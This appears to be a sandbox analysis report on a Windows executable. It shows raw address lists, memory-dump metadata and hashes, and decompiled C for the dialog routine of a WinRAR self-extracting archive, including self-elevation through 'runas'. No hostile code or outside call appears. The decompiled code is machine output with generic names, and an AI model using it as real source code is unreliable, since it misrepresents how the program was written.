                                                                                                                0x00ecaa1e
                                                                                                                0x00eca9de
                                                                                                                0x00eca9e4
                                                                                                                0x00eca9ed
                                                                                                                0x00eca9f1
                                                                                                                0x00eca9f7
                                                                                                                0x00eca9f7
                                                                                                                0x00ecaa22
                                                                                                                0x00eca9cc
                                                                                                                0x00eca9cc
                                                                                                                0x00eca9cc
                                                                                                                0x00ecaa31
                                                                                                                0x00ecaa35
                                                                                                                0x00ecaa37
                                                                                                                0x00ecaa3f
                                                                                                                0x00ecaa80
                                                                                                                0x00ecaa80
                                                                                                                0x00ecaa89
                                                                                                                0x00ecaa8b
                                                                                                                0x00ecaa95
                                                                                                                0x00ecaa91
                                                                                                                0x00ecaa93
                                                                                                                0x00ecaa93
                                                                                                                0x00ecaa9d
                                                                                                                0x00ecaab1
                                                                                                                0x00ecaadd
                                                                                                                0x00ecaadd
                                                                                                                0x00ecaae1
                                                                                                                0x00000000
                                                                                                                0x00ecaae1
                                                                                                                0x00ecaab3
                                                                                                                0x00ecaab7
                                                                                                                0x00ecaab7
                                                                                                                0x00ecaabe
                                                                                                                0x00ecaac8
                                                                                                                0x00ecaad1
                                                                                                                0x00ecaad5
                                                                                                                0x00ecaad9
                                                                                                                0x00000000
                                                                                                                0x00ecaa41
                                                                                                                0x00ecaa41
                                                                                                                0x00ecaa45
                                                                                                                0x00ecaa49
                                                                                                                0x00ecaa50
                                                                                                                0x00ecaa58
                                                                                                                0x00ecaa5c
                                                                                                                0x00ecaa5f
                                                                                                                0x00ecaa63
                                                                                                                0x00ecaa65
                                                                                                                0x00ecaa68
                                                                                                                0x00ecaa6b
                                                                                                                0x00ecaa6d
                                                                                                                0x00ecaa71
                                                                                                                0x00ecaa77
                                                                                                                0x00ecaa7b
                                                                                                                0x00ecaa7c
                                                                                                                0x00000000
                                                                                                                0x00ecaa7c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca892
                                                                                                                0x00eca892
                                                                                                                0x00eca8a0
                                                                                                                0x00eca8a3
                                                                                                                0x00eca8a8
                                                                                                                0x00eca8aa
                                                                                                                0x00eca8ae
                                                                                                                0x00eca8b0
                                                                                                                0x00eca8b4
                                                                                                                0x00eca8ba
                                                                                                                0x00eca8bc
                                                                                                                0x00eca8bc
                                                                                                                0x00eca8c0
                                                                                                                0x00eca8c4
                                                                                                                0x00eca8ca
                                                                                                                0x00eca8ef
                                                                                                                0x00eca8ef
                                                                                                                0x00eca8f8
                                                                                                                0x00eca900
                                                                                                                0x00eca900
                                                                                                                0x00eca906
                                                                                                                0x00eca912
                                                                                                                0x00eca916
                                                                                                                0x00eca920
                                                                                                                0x00eca921
                                                                                                                0x00eca929
                                                                                                                0x00ecab34
                                                                                                                0x00ecab3d
                                                                                                                0x00ecab3d
                                                                                                                0x00ecab42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca8cc
                                                                                                                0x00eca8cc
                                                                                                                0x00eca8d7
                                                                                                                0x00eca8d9
                                                                                                                0x00eca8ea
                                                                                                                0x00eca8ea
                                                                                                                0x00eca8ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca8df
                                                                                                                0x00eca8e1
                                                                                                                0x00eca8e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eca8e8
                                                                                                                0x00eca8e8
                                                                                                                0x00000000
                                                                                                                0x00eca8ea
                                                                                                                0x00eca92f
                                                                                                                0x00eca933
                                                                                                                0x00eca933
                                                                                                                0x00eca936
                                                                                                                0x00eca939
                                                                                                                0x00eca93d
                                                                                                                0x00eca941
                                                                                                                0x00eca948
                                                                                                                0x00eca94a
                                                                                                                0x00eca94f
                                                                                                                0x00eca957
                                                                                                                0x00eca96d
                                                                                                                0x00eca97d
                                                                                                                0x00eca984
                                                                                                                0x00eca98b
                                                                                                                0x00eca993
                                                                                                                0x00eca99a
                                                                                                                0x00eca99a
                                                                                                                0x00eca99e
                                                                                                                0x00eca9a5
                                                                                                                0x00eca9a9
                                                                                                                0x00eca9b1
                                                                                                                0x00000000
                                                                                                                0x00eca9b1
                                                                                                                0x00ecaaf1
                                                                                                                0x00ecaaf2
                                                                                                                0x00ecaaf5
                                                                                                                0x00ecaaf9
                                                                                                                0x00ecaafd
                                                                                                                0x00000000
                                                                                                                0x00eca869
                                                                                                                0x00eca79e
                                                                                                                0x00eca7a0
                                                                                                                0x00eca7a0
                                                                                                                0x00eca7a4
                                                                                                                0x00eca7a7
                                                                                                                0x00eca7ae
                                                                                                                0x00eca7ae
                                                                                                                0x00000000
                                                                                                                0x00eca7a0
                                                                                                                0x00eca712
                                                                                                                0x00eca71b
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: c
                                                                                                                • API String ID: 0-112844655
                                                                                                                • Opcode ID: cacfd7adc98316e63ce002b3d498caa833128e29f38c3ba048d8ada5eda4e99c
                                                                                                                • Instruction ID: df622e2a77844a4cf9fd98ab77ad41e3f02c71bf4af83d635349b54a07907f48
                                                                                                                • Opcode Fuzzy Hash: cacfd7adc98316e63ce002b3d498caa833128e29f38c3ba048d8ada5eda4e99c
                                                                                                                • Instruction Fuzzy Hash: E4E12871A083498FC728DF28D680A6AB7E1FBC8708F14593EE59A97341D731E946CB43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED3FBC, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED3FBC() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00ED3FD0); // executed
				return _t1;
			}




                                                                                                                0x00ed3fc1
                                                                                                                0x00ed3fc7

                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00013FD0,00ED3AE5), ref: 00ED3FC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: a01eb67c972c0c5dccb4e789c0dc995d9a3fbc1b09fd3f9e5dc183c4bcb8995b
                                                                                                                • Instruction ID: 0ed905942b1dfdc9050f0c9864a1f03c93dc82e531feeb25af81663401d00f67
                                                                                                                • Opcode Fuzzy Hash: a01eb67c972c0c5dccb4e789c0dc995d9a3fbc1b09fd3f9e5dc183c4bcb8995b
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED01A0, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00ED01A0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t104;
				long _t105;
				struct HWND__* _t106;
				struct HWND__* _t110;
				void* _t113;
				void* _t114;
				int _t115;
				void* _t132;
				void* _t136;
				signed int _t148;
				void* _t165;
				int _t168;
				void* _t181;
				void* _t188;
				void* _t189;
				long _t194;
				void* _t219;
				signed int _t229;
				void* _t230;
				int _t245;
				long _t246;
				long _t247;
				long _t248;
				signed int _t255;
				WCHAR* _t256;
				int _t260;
				int _t262;
				void* _t267;
				void* _t271;
				signed short _t276;
				int _t278;
				WCHAR* _t287;
				WCHAR* _t289;
				intOrPtr _t291;
				int _t301;
				struct HWND__* _t303;
				intOrPtr _t306;
				void* _t307;
				struct HWND__* _t308;
				void* _t310;
				struct HWND__* _t312;
				long _t313;
				struct HWND__* _t314;
				void* _t315;
				void* _t316;
				void* _t318;
				void* _t319;
				void* _t321;

				_t300 = __edx;
				_t286 = __ecx;
				E00ED3344();
				E00ED3370();
				_t276 =  *(_t319 + 0x10);
				_t306 =  *((intOrPtr*)(_t319 + 0xc));
				_t303 =  *(_t319 + 8);
				if(E00EC11DA(__edx, _t303, _t306, _t276,  *((intOrPtr*)(_t319 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t307 = _t306 - 0x110;
					__eflags = _t307;
					if(__eflags == 0) {
						_push(_t303);
						E00ED1F2F(_t286, __edx, __eflags, __fp0);
						_t104 =  *0xf10b84;
						_t278 = 1;
						 *0xf0ca30 = _t303;
						 *0xf0ca58 = _t303;
						__eflags = _t104;
						if(_t104 != 0) {
							SendMessageW(_t303, 0x80, 1, _t104); // executed
						}
						_t105 =  *0xf1b1ec;
						__eflags = _t105;
						if(_t105 != 0) {
							SendDlgItemMessageW(_t303, 0x6c, 0x172, 0, _t105); // executed
						}
						_t106 = GetDlgItem(_t303, 0x68);
						 *(_t319 - 0x14) = _t106;
						SendMessageW(_t106, 0x435, 0, 0x400000);
						E00ECF158(_t319 - 0x1174, 0x800);
						_t110 = GetDlgItem(_t303, 0x66);
						__eflags =  *0xf0ea72;
						_t308 = _t110;
						 *(_t319 - 0x18) = _t308;
						_t287 = 0xf0ea72;
						if( *0xf0ea72 == 0) {
							_t287 = _t319 - 0x1174;
						}
						SetWindowTextW(_t308, _t287);
						E00ECF645(_t308); // executed
						_push(0xf0ca48);
						_push(0xf0ca44);
						_push(0xf22300);
						_push(_t303);
						 *0xf0ca63 = 0; // executed
						_t113 = E00ECFA4C(_t300, __eflags); // executed
						__eflags = _t113;
						if(_t113 == 0) {
							 *0xf0ca36 = _t278;
						}
						__eflags =  *0xf0ca48;
						if( *0xf0ca48 > 0) {
							_push(7);
							_push( *0xf0ca44);
							_push(_t303);
							E00ED10B5(_t300);
						}
						__eflags =  *0xf23308;
						if( *0xf23308 == 0) {
							SetDlgItemTextW(_t303, 0x6b, E00EC4A3C(_t287, 0xbf));
							SetDlgItemTextW(_t303, _t278, E00EC4A3C(_t287, 0xbe));
						}
						__eflags =  *0xf0ca48;
						if( *0xf0ca48 <= 0) {
							L103:
							__eflags =  *0xf0ca63;
							if( *0xf0ca63 != 0) {
								L114:
								__eflags =  *0xf0ea6c - 2;
								if( *0xf0ea6c == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0xf0da68;
								if( *0xf0da68 != 0) {
									E00EC1197(_t303, 0x67, 0);
									E00EC1197(_t303, 0x66, 0);
								}
								_t114 =  *0xf0ea6c;
								__eflags = _t114;
								if(_t114 != 0) {
									__eflags =  *0xf0ca34;
									if( *0xf0ca34 == 0) {
										_push(0);
										_push(_t278);
										_push(0x111);
										_push(_t303);
										__eflags = _t114 - _t278;
										if(_t114 != _t278) {
											 *0xf2608c();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xf0ca36;
								if( *0xf0ca36 != 0) {
									SetDlgItemTextW(_t303, _t278, E00EC4A3C(_t287, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xf222f4;
							if( *0xf222f4 != 0) {
								goto L114;
							}
							__eflags =  *0xf0ea6c;
							if( *0xf0ea6c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t319 - 0x9698)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E00EC6727(__eflags, _t319 - 0x9698, " ", 0x2000);
										E00EC6727(__eflags, _t319 - 0x9698, E00EC4A3C(_t287, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0xf23308;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xf23308;
								if( *0xf23308 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t287 =  *0xf0ca4c; // 0x303f770
							E00ECE9B5(_t287, __eflags,  *0xf0ca40,  *(_t319 - 0x14), _t319 - 0x9698, 0, 0);
							_t308 =  *(_t319 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0xf0ca44);
							_push(_t303);
							E00ED10B5(_t300);
							_t132 =  *0xf222f4;
							__eflags = _t132;
							if(_t132 != 0) {
								__eflags =  *0xf0ea6c;
								if(__eflags == 0) {
									_t289 =  *0xf0ca4c; // 0x303f770
									E00ECE9B5(_t289, __eflags,  *0xf0ca40,  *(_t319 - 0x14), _t132, 0, 0);
									L00ED869E( *0xf222f4);
									_pop(_t287);
								}
							}
							__eflags =  *0xf0ea6c - _t278;
							if( *0xf0ea6c == _t278) {
								L102:
								_push(_t278);
								_push( *0xf0ca44);
								_push(_t303); // executed
								E00ED10B5(_t300); // executed
								goto L103;
							} else {
								 *0xf260ac(_t303);
								__eflags =  *0xf0ea6c - _t278;
								if( *0xf0ea6c == _t278) {
									goto L102;
								}
								__eflags =  *0xf0ea71;
								if( *0xf0ea71 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xf0ca44);
								_push(_t303);
								E00ED10B5(_t300);
								__eflags =  *0xf23300;
								if( *0xf23300 == 0) {
									goto L102;
								}
								_t136 = DialogBoxParamW( *0xf0ca40, L"LICENSEDLG", 0, E00ECFFA0, 0);
								__eflags = _t136;
								if(_t136 == 0) {
									L25:
									 *0xf0ca34 = _t278;
									L26:
									_push(_t278);
									L13:
									 *0xf2609c(_t303);
									L125:
									_t115 = _t278;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t319 - 0xc));
									return _t115;
								}
								goto L102;
							}
						}
					}
					__eflags = _t307 != 1;
					if(_t307 != 1) {
						L7:
						_t115 = 0;
						goto L126;
					}
					_t148 = (_t276 & 0x0000ffff) - 1;
					__eflags = _t148;
					if(_t148 == 0) {
						__eflags =  *0xf0ca35;
						if( *0xf0ca35 != 0) {
							L23:
							GetDlgItemTextW(_t303, 0x66, _t319 - 0x2174, 0x800);
							__eflags =  *0xf0ca35;
							if( *0xf0ca35 == 0) {
								__eflags =  *0xf0ca36;
								if( *0xf0ca36 == 0) {
									_t312 = GetDlgItem(_t303, 0x68);
									__eflags =  *0xf0ca5c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t312, 0xb1, 0, 0xffffffff);
										SendMessageW(_t312, 0xc2, 0, 0xee7544);
									}
									SetFocus(_t312);
									__eflags =  *0xf0da68;
									if( *0xf0da68 == 0) {
										_t313 = 0x800;
										E00EC674F(_t319 - 0x1174, _t319 - 0x2174, 0x800);
										E00ED1CE1(_t286, _t319 - 0x1174, 0x800);
										E00EC37E6(_t319 - 0x4298, 0x880, E00EC4A3C(_t286, 0xb9), _t319 - 0x1174);
										_t321 = _t321 + 0x10;
										_push(_t319 - 0x4298);
										_push(0);
										E00ED1D62();
									} else {
										_push(E00EC4A3C(_t286, 0xba));
										_push(0);
										E00ED1D62();
										_t313 = 0x800;
									}
									__eflags =  *0xf0ea71;
									if( *0xf0ea71 == 0) {
										E00ED23C0(_t319 - 0x2174);
									}
									_push(0);
									_push(_t319 - 0x2174);
									 *(_t319 - 0xe) = 0;
									_t165 = E00EC23EF(0, _t319);
									_t278 = 1;
									__eflags = _t165;
									if(_t165 != 0) {
										L40:
										_t301 = E00ECF6A0(_t319 - 0x2174);
										 *(_t319 - 0xd) = _t301;
										__eflags = _t301;
										if(_t301 != 0) {
											L43:
											_t168 =  *(_t319 - 0xe);
											L44:
											_t286 =  *0xf0ea71;
											__eflags = _t286;
											if(_t286 != 0) {
												L50:
												__eflags =  *(_t319 - 0xd);
												if( *(_t319 - 0xd) != 0) {
													 *0xf0ca38 = _t278;
													E00EC11B5(_t303, 0x67, 0);
													E00EC11B5(_t303, 0x66, 0);
													SetDlgItemTextW(_t303, _t278, E00EC4A3C(_t286, 0xe6)); // executed
													E00EC11B5(_t303, 0x69, _t278);
													SetDlgItemTextW(_t303, 0x65, 0xee7544); // executed
													_t314 = GetDlgItem(_t303, 0x65);
													__eflags = _t314;
													if(_t314 != 0) {
														_t194 = GetWindowLongW(_t314, 0xfffffff0) | 0x00000080;
														__eflags = _t194;
														SetWindowLongW(_t314, 0xfffffff0, _t194);
													}
													_push(5);
													_push( *0xf0ca44);
													_push(_t303);
													E00ED10B5(_t301);
													_push(2);
													_push( *0xf0ca44);
													_push(_t303);
													E00ED10B5(_t301);
													_push(0xf22300);
													_push(_t303);
													 *0xf25320 = _t278; // executed
													E00ED22F0(_t286, __eflags); // executed
													_push(6);
													_push( *0xf0ca44);
													 *0xf25320 = 0;
													_push(_t303);
													E00ED10B5(_t301);
													__eflags =  *0xf0ca34;
													if( *0xf0ca34 == 0) {
														__eflags =  *0xf0ca5c;
														if( *0xf0ca5c == 0) {
															__eflags =  *0xf23314;
															if( *0xf23314 == 0) {
																_push(4);
																_push( *0xf0ca44);
																_push(_t303); // executed
																E00ED10B5(_t301); // executed
															}
														}
													}
													E00EC1197(_t303, _t278, _t278);
													 *0xf0ca38 =  *0xf0ca38 & 0x00000000;
													__eflags =  *0xf0ca38;
													_t181 =  *0xf0ca34; // 0x0
													goto L75;
												}
												__eflags = _t286;
												_t168 = (_t168 & 0xffffff00 | _t286 != 0x00000000) - 0x00000001 &  *(_t319 - 0xe);
												__eflags = _t168;
												L52:
												__eflags = _t168;
												 *(_t319 - 0xd) = _t168 == 0;
												__eflags = _t168;
												if(_t168 == 0) {
													L66:
													__eflags =  *(_t319 - 0xd);
													if( *(_t319 - 0xd) != 0) {
														_push(E00EC4A3C(_t286, 0x9a));
														E00EC37E6(_t319 - 0x5698, 0xa00, L"\"%s\"\n%s", _t319 - 0x2174);
														E00EC199D(0xf10b74, _t278);
														E00ECF2B3(_t303, _t319 - 0x5698, E00EC4A3C(0xf10b74, 0x96), 0x30);
														 *0xf0ca5c =  *0xf0ca5c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t319 - 0x1174, _t313);
												_push(0x80);
												_t286 = 0xf10a72;
												_push(_t319 - 0x174);
												E00EC56BA(0xf10a72, _t301);
												_push(0xf0fa72);
												E00EC37E6(_t319 - 0x11cb0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t319 - 0x2174);
												_t321 = _t321 + 0x14;
												 *(_t319 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t319 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t319 - 0x48)) = _t319 - 0x1174;
												 *((intOrPtr*)(_t319 - 0x44)) = _t319 - 0x11cb0;
												 *(_t319 - 0x50) = _t303;
												 *((intOrPtr*)(_t319 - 0x4c)) = L"runas";
												 *(_t319 - 0x3c) = _t278;
												 *((intOrPtr*)(_t319 - 0x38)) = 0;
												 *((intOrPtr*)(_t319 - 0x40)) = 0xf0ca68;
												_t316 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t319 - 0x14) = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													 *(_t319 - 0x1c) =  *(_t319 - 0x14);
												} else {
													 *0xf1b1f0 = 0;
													_t230 = GetCommandLineW();
													__eflags = _t230;
													if(_t230 != 0) {
														E00EC674F(0xf1b1f2, _t230, 0x2000);
													}
													E00ECFDFE(_t286, 0xf1f1f2, 7);
													E00ECFDFE(_t286, 0xf201f2, 2);
													E00ECFDFE(_t286, 0xf211f2, 0x10);
													 *0xf222f3 = _t278;
													_t286 = 0xf221f2;
													E00EC582D(_t278, 0xf221f2, _t319 - 0x174);
													 *(_t319 - 0x1c) = MapViewOfFile(_t316, 2, 0, 0, 0);
													E00ED4C60(_t237, 0xf1b1f0, 0x7104);
													_t321 = _t321 + 0xc;
												}
												_t219 = ShellExecuteExW(_t319 - 0x58);
												E00EC5878(_t319 - 0x174, 0x80);
												E00EC5878(_t319 - 0x11cb0, 0x430c);
												__eflags = _t219;
												if(_t219 == 0) {
													_t318 =  *(_t319 - 0x1c);
													 *(_t319 - 0xd) = _t278;
													goto L64;
												} else {
													WaitForInputIdle( *(_t319 - 0x20), 0x2710);
													_t71 = _t319 - 0x18;
													 *_t71 =  *(_t319 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t318 =  *(_t319 - 0x1c);
													while(1) {
														__eflags =  *_t318;
														if( *_t318 != 0) {
															break;
														}
														Sleep(0x64);
														_t229 =  *(_t319 - 0x18) + 1;
														 *(_t319 - 0x18) = _t229;
														__eflags = _t229 - 0x64;
														if(_t229 < 0x64) {
															continue;
														}
														break;
													}
													 *0xf23314 =  *(_t319 - 0x20);
													L64:
													__eflags =  *(_t319 - 0x14);
													if( *(_t319 - 0x14) != 0) {
														UnmapViewOfFile(_t318);
														CloseHandle( *(_t319 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t301;
											if(_t301 == 0) {
												goto L52;
											}
											E00EC37E6(_t319 - 0x1174, _t313, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t321 = _t321 + 0x10;
											E00EC1AA7(_t319 - 0x3198);
											 *(_t319 - 4) =  *(_t319 - 4) & 0x00000000;
											_push(0x11);
											_push(_t319 - 0x1174);
											_t245 = E00EC1BCE(_t319 - 0x3198);
											 *(_t319 - 0xd) = _t245;
											__eflags = _t245;
											if(_t245 == 0) {
												_t246 = GetLastError();
												__eflags = _t246 - 5;
												if(_t246 == 5) {
													 *(_t319 - 0xe) = _t278;
												}
											}
											_t39 = _t319 - 4;
											 *_t39 =  *(_t319 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t168 = E00EC1B02(_t319 - 0x3198, _t313); // executed
											_t286 =  *0xf0ea71;
											goto L50;
										}
										_t247 = GetLastError();
										_t301 =  *(_t319 - 0xd);
										__eflags = _t247 - 5;
										if(_t247 != 5) {
											goto L43;
										}
										_t168 = _t278;
										 *(_t319 - 0xe) = _t168;
										goto L44;
									} else {
										_t248 = GetLastError();
										__eflags = _t248 - 5;
										if(_t248 == 5) {
											L39:
											 *(_t319 - 0xe) = _t278;
											goto L40;
										}
										__eflags = _t248 - 3;
										if(_t248 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t278 = 1;
									_t181 = 1;
									 *0xf0ca34 = 1;
									L75:
									__eflags =  *0xf0ca5c;
									if( *0xf0ca5c <= 0) {
										goto L26;
									}
									__eflags = _t181;
									if(_t181 != 0) {
										goto L26;
									}
									 *0xf0ca35 = _t278;
									SetDlgItemTextW(_t303, _t278, E00EC4A3C(_t286, 0x90));
									_t291 =  *0xf10b74;
									__eflags = _t291 - 9;
									if(_t291 != 9) {
										__eflags = _t291 - 3;
										_t188 = ((0 | _t291 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t188;
										 *(_t319 - 0x14) = _t188;
										_t315 = _t188;
									} else {
										_t315 = 0xa0;
									}
									_t189 = E00EC4A3C(_t291, 0x96);
									E00ECF2B3(_t303, E00EC4A3C(_t291, _t315), _t189, 0x30);
									goto L125;
								}
							}
							_t278 = 1;
							__eflags =  *0xf0ca36;
							if( *0xf0ca36 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xf25320;
						if( *0xf25320 == 0) {
							goto L23;
						} else {
							__eflags =  *0xf25321;
							_t255 = _t148 & 0xffffff00 |  *0xf25321 == 0x00000000;
							__eflags = _t255;
							 *0xf25321 = _t255;
							_t256 = E00EC4A3C((0 | _t255 != 0x00000000) + 0xe6, (0 | _t255 != 0x00000000) + 0xe6);
							_t278 = 1;
							SetDlgItemTextW(_t303, 1, _t256);
							while(1) {
								__eflags =  *0xf25321;
								if( *0xf25321 == 0) {
									goto L125;
								}
								__eflags =  *0xf0ca34;
								if( *0xf0ca34 != 0) {
									goto L125;
								}
								_t260 = GetMessageW(_t319 - 0x74, 0, 0, 0);
								__eflags = _t260;
								if(_t260 == 0) {
									goto L125;
								} else {
									_t262 = IsDialogMessageW(_t303, _t319 - 0x74);
									__eflags = _t262;
									if(_t262 == 0) {
										TranslateMessage(_t319 - 0x74);
										DispatchMessageW(_t319 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t267 = _t148 - 1;
					__eflags = _t267;
					if(_t267 == 0) {
						_t278 = 1;
						__eflags =  *0xf0ca38;
						 *0xf0ca34 = 1;
						if( *0xf0ca38 == 0) {
							goto L12;
						}
						__eflags =  *0xf0ca5c;
						if( *0xf0ca5c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t267 == 0x65;
					if(_t267 == 0x65) {
						_t271 = E00EC1110(_t303, E00EC4A3C(_t286, 0x64), _t319 - 0x1174);
						__eflags = _t271;
						if(_t271 != 0) {
							SetDlgItemTextW(_t303, 0x66, _t319 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t115 = 1;
				goto L126;
			}





















































                                                                                                                0x00ed01a0
                                                                                                                0x00ed01a0
                                                                                                                0x00ed01a5
                                                                                                                0x00ed01af
                                                                                                                0x00ed01b5
                                                                                                                0x00ed01b9
                                                                                                                0x00ed01bd
                                                                                                                0x00ed01d6
                                                                                                                0x00ed01e0
                                                                                                                0x00ed01e0
                                                                                                                0x00ed01e6
                                                                                                                0x00ed088b
                                                                                                                0x00ed088c
                                                                                                                0x00ed0891
                                                                                                                0x00ed0898
                                                                                                                0x00ed0899
                                                                                                                0x00ed089f
                                                                                                                0x00ed08a5
                                                                                                                0x00ed08a7
                                                                                                                0x00ed08b1
                                                                                                                0x00ed08b1
                                                                                                                0x00ed08b7
                                                                                                                0x00ed08bc
                                                                                                                0x00ed08be
                                                                                                                0x00ed08cb
                                                                                                                0x00ed08cb
                                                                                                                0x00ed08d4
                                                                                                                0x00ed08e7
                                                                                                                0x00ed08ea
                                                                                                                0x00ed08fc
                                                                                                                0x00ed0904
                                                                                                                0x00ed090a
                                                                                                                0x00ed0912
                                                                                                                0x00ed0914
                                                                                                                0x00ed0917
                                                                                                                0x00ed091c
                                                                                                                0x00ed091e
                                                                                                                0x00ed091e
                                                                                                                0x00ed0926
                                                                                                                0x00ed092d
                                                                                                                0x00ed0932
                                                                                                                0x00ed0937
                                                                                                                0x00ed093c
                                                                                                                0x00ed0941
                                                                                                                0x00ed0942
                                                                                                                0x00ed0949
                                                                                                                0x00ed094e
                                                                                                                0x00ed0950
                                                                                                                0x00ed0952
                                                                                                                0x00ed0952
                                                                                                                0x00ed0958
                                                                                                                0x00ed095f
                                                                                                                0x00ed0961
                                                                                                                0x00ed0963
                                                                                                                0x00ed0969
                                                                                                                0x00ed096a
                                                                                                                0x00ed096a
                                                                                                                0x00ed096f
                                                                                                                0x00ed0976
                                                                                                                0x00ed0986
                                                                                                                0x00ed0999
                                                                                                                0x00ed0999
                                                                                                                0x00ed099f
                                                                                                                0x00ed09a6
                                                                                                                0x00ed0a57
                                                                                                                0x00ed0a57
                                                                                                                0x00ed0a5e
                                                                                                                0x00ed0b07
                                                                                                                0x00ed0b07
                                                                                                                0x00ed0b0e
                                                                                                                0x00ed0b13
                                                                                                                0x00ed0b13
                                                                                                                0x00ed0b19
                                                                                                                0x00ed0b20
                                                                                                                0x00ed0b27
                                                                                                                0x00ed0b31
                                                                                                                0x00ed0b31
                                                                                                                0x00ed0b36
                                                                                                                0x00ed0b3b
                                                                                                                0x00ed0b3d
                                                                                                                0x00ed0b3f
                                                                                                                0x00ed0b46
                                                                                                                0x00ed0b48
                                                                                                                0x00ed0b4a
                                                                                                                0x00ed0b4b
                                                                                                                0x00ed0b50
                                                                                                                0x00ed0b51
                                                                                                                0x00ed0b53
                                                                                                                0x00ed0b5d
                                                                                                                0x00ed0b55
                                                                                                                0x00ed0b55
                                                                                                                0x00ed0b55
                                                                                                                0x00ed0b53
                                                                                                                0x00ed0b46
                                                                                                                0x00ed0b63
                                                                                                                0x00ed0b6a
                                                                                                                0x00ed0b79
                                                                                                                0x00ed0b79
                                                                                                                0x00000000
                                                                                                                0x00ed0b6a
                                                                                                                0x00ed0a64
                                                                                                                0x00ed0a6b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0a71
                                                                                                                0x00ed0a78
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed0a7e
                                                                                                                0x00ed0a80
                                                                                                                0x00ed0a85
